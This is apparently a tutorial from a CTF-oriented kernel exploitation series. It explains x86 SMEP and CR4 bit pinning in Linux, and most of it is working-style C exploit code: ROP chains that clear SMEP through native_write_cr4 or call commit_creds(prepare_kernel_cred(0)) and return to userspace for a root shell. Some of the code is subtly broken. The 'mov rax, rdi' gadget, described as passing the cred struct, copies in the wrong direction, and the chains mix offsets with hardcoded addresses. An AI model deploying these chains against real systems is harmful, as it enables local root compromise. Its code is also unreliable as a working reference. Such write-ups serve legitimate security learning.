Supervisor mode execution protection (SMEP)

Supervisor mode execution protection (SMEP) is a mitigation introduced by Google engineers in the Linux kernel that prevents ret2usr exploits from working. While in kernel mode (ring 0), the processor cannot execute code from userspace pages. This is a hardware feature offered by Intel chips and is controlled by the 20th bit in the CR4 register. The same mitigation exists on ARM devices, but there it's called PXN (also see this article for Android).
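For reference, the relevant CR4 bit definitions live in the kernel's arch/x86/include/uapi/asm/processor-flags.h (simplified here, with the _BITUL macro expanded):

#define X86_CR4_SMEP (1UL << 20)	/* enable SMEP support */
#define X86_CR4_SMAP (1UL << 21)	/* enable SMAP support */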

We can check for SMEP through /proc/cpuinfo:

# cat /proc/cpuinfo | grep smep
flags		: fpu de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx lm constant_tsc nopl xtopology cpuid pni cx16 hypervisor smep smap

Before Linux Kernel 5.1

One technique proposed through a Google Project Zero post is to zero out the 20th bit of the CR4 register. To do this, Andrey Konovalov used a func(data) primitive to call native_write_cr4(val) with val having the 20th (and 21st) bit set to 0.

This link to the kernel source shows that the function accepts an arbitrary value and attempts to set the CR4 register to the value provided. However, we can see that the function mentions some bit pinning!

void native_write_cr4(unsigned long val)
{
	unsigned long bits_changed = 0;

set_register:
	asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

	if (static_branch_likely(&cr_pinning)) {
		if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
			bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
			val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
			goto set_register;
		}
		/* Warn after we've corrected the changed bits. */
		WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
			  bits_changed);
	}
}

It turns out that the kernel ensures those bits are not changed after the CPU finishes initializing, and just a couple of lines above this function it specifies which bits those are:

/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
	X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;
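To see why this defeats the CR4 overwrite, here is the pinning logic worked through by hand, simplified by assuming only the SMEP and SMAP bits (mask 0x300000) are pinned set:

/*
 * Attacker calls native_write_cr4(0x6f0), i.e. bits 20/21 clear:
 *
 *   val & cr4_pinned_mask = 0x6f0 & 0x300000 = 0x0       (!= 0x300000)
 *   bits_changed          = 0x0 ^ 0x300000   = 0x300000
 *   val                   = 0x6f0 | 0x300000 = 0x3006f0
 *
 * The loop writes the corrected value (SMEP/SMAP forced back on)
 * into CR4, and the kernel only emits a WARN_ONCE.
 */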

We need the address of native_write_cr4 and a gadget to fill our RDI register, since it will hold the argument the function expects. Using ROPgadget we can find a gadget, and using either our leak from before or a read from /proc/kallsyms, we can get the address of native_write_cr4.
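As a sketch of the /proc/kallsyms route (assuming the challenge lets us read real addresses, i.e. kptr_restrict isn't zeroing them out), a small helper like the hypothetical lookup_symbol below does the job:

#include <stdio.h>
#include <string.h>

// Scan /proc/kallsyms for a symbol and return its address.
// Returns 0 if the symbol isn't found (or addresses are hidden).
unsigned long lookup_symbol(const char *name) {
  unsigned long addr;
  char type, sym[256], line[512];
  FILE *f = fopen("/proc/kallsyms", "r");

  if (f == NULL)
    return 0;

  while (fgets(line, sizeof(line), f) != NULL) {
    // Each line looks like: "ffffffff8102ddf0 T native_write_cr4"
    if (sscanf(line, "%lx %c %255s", &addr, &type, sym) == 3 &&
        strcmp(sym, name) == 0) {
      fclose(f);
      return addr;
    }
  }

  fclose(f);
  return 0;
}

Subtracting the kernel base from lookup_symbol("native_write_cr4") gives the same offset used in the payload below.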

A quick note here on ROP gadget finding for kernels: make sure you're not running ROPgadget on the bzImage, since that's the entire boot image containing the vmlinux kernel image. There is an extract-vmlinux script inside the kernel tree that extracts the vmlinux kernel we want to use to find our gadgets.

$ ./linux-5.4/scripts/extract-vmlinux linux-5.4/arch/x86/boot/bzImage > vmlinux
$ ROPgadget --binary vmlinux > kernel_gadgets
$ cat kernel_gadgets | grep ': pop rdi ; ret'
0x000000000003be1d : pop rdi ; ret

Using these pieces we can construct a small ROP chain that ends with a jump into our give_me_root function:

unsigned long pop_rdi_ret = 0x3be1d;
unsigned long native_write_cr4_offset = 0x2ddf0;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL;
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = kernel_base + pop_rdi_ret;
  buf[cookie_offset + 3] = 0x6f0; // or 0x407f0
  /*
   * 0x407f0 -> 0b1000000011111110000
   * 0x6f0 -> 0b11011110000
   */
  buf[cookie_offset + 4] = kernel_base + native_write_cr4_offset;
  // Once SMEP is off, we can return to userspace pages again!
  buf[cookie_offset + 5] = (unsigned long)give_me_root;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}
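For context, give_me_root is the userspace function from the earlier ret2usr post. A minimal sketch of the idea (the globals and offset names here are assumptions, not the series' exact code):

// Runs in ring 0 but lives in a userspace page, which is exactly
// what SMEP normally forbids. Sketch only; kernel_base and the
// *_offset values are assumed globals resolved earlier.
void give_me_root(void) {
  void *(*pkc)(void *) = (void *(*)(void *))(kernel_base + prepare_kernel_cred_offset);
  int (*cc)(void *) = (int (*)(void *))(kernel_base + commit_creds_offset);

  cc(pkc(0)); // commit_creds(prepare_kernel_cred(0))

  // Still in kernel mode here: a swapgs/iretq trampoline (covered
  // in the ret2usr post) returns to userspace to spawn a shell.
}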

If SMEP bit is pinned

If the SMEP bit is pinned, then we can't overwrite that part of the CR4 register with our own payload, and we need to ROP our way through the prepare_kernel_cred and commit_creds calls instead. The steps we need to take are straightforward: implement the following pseudo-assembly as a ROP chain (swapgs restores the userspace GS base, and iretq pops RIP, CS, RFLAGS, RSP, and SS to return to ring 3):

mov rdi, 0
call prepare_kernel_cred
mov rdi, rax
call commit_creds
swapgs
iretq
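Note that iretq needs a valid userspace frame (RIP, CS, RFLAGS, RSP, SS) on the stack. Those values are captured in userspace before triggering the overflow; here is a sketch of a typical save_state helper (assuming x86-64 and GCC inline assembly; the exact code from earlier in this series may differ):

unsigned long user_cs, user_ss, user_rflags, user_sp, user_rip;

// Save the current userspace segment selectors, stack pointer, and
// flags so the iretq frame can restore them after privilege
// escalation. Call this before triggering the overflow.
void save_state(void) {
  __asm__ __volatile__(
      "mov %%cs, %0\n\t"
      "mov %%ss, %1\n\t"
      "mov %%rsp, %2\n\t"
      "pushfq\n\t"
      "pop %3\n\t"
      : "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
      :
      : "memory");
}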

Running the previous ret2usr payload will result in a kernel panic, since SMEP stays set and the jump into userspace code faults. Instead, we build the full ROP chain:

// 0xffffffff8103be1d : pop rdi ; ret
unsigned long pop_rdi_ret = 0xffffffff8103be1d;
// 0xffffffff81033b50 : mov rax, rdi ; ret
unsigned long mov_rax_rdi = 0xffffffff81033b50;
//0xffffffff81c00eaa : swapgs ; popfq ; ret
unsigned long swapgs_popfq_ret = 0xffffffff81c00eaa;
//ffffffff810240c2: 48 cf                 iretq  
unsigned long iretq = 0xffffffff810240c2;

void overwrite_pc(int fd, unsigned long stack_cookie, unsigned long kernel_base) {
  unsigned long *buf = NULL; //[BUF_SIZE];
  unsigned int cookie_offset = 16;
  int bytes_written;

  buf = malloc(BUF_SIZE);
  if (buf == NULL)
    exit_and_log("Failed to malloc\n");

  memset(buf, '\x00', BUF_SIZE);

  user_rip = (unsigned long)drop_shell;

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = pop_rdi_ret;
  buf[cookie_offset + 3] = 0 ; // Argument for prepare_kernel_cred
  buf[cookie_offset + 4] = prepare_kernel_cred;
  buf[cookie_offset + 5] = mov_rax_rdi; // move cred struct to argument
  buf[cookie_offset + 6] = commit_creds;
  buf[cookie_offset + 7] = swapgs_popfq_ret;
  buf[cookie_offset + 8] = 0xDEADBEEF; // value for popfq
  buf[cookie_offset + 9] = iretq; // swap from kernel to userspace
  buf[cookie_offset + 10] = user_rip; // <-- here is drop shell function
  buf[cookie_offset + 11] = user_cs;
  buf[cookie_offset + 12] = user_rflags;
  buf[cookie_offset + 13] = user_sp;
  buf[cookie_offset + 14] = user_ss;

  // After this write we won't return to the
  // rest of this function
  bytes_written = write(fd, buf, BUF_SIZE);

  printf("Write returned %d\n", bytes_written);

  free(buf);
}

Success!

These changes were introduced in Linux Kernel 5.1 and prevent us from overwriting those bits using this function. For kernels before 5.1 (common in CTFs) we can still use this technique, executing a two-gadget ROP chain to call this function.

The process of generating the ROP chain for a given kernel is pretty straightforward, and you shouldn't run into any road bumps. My code for the overflow is shown above.
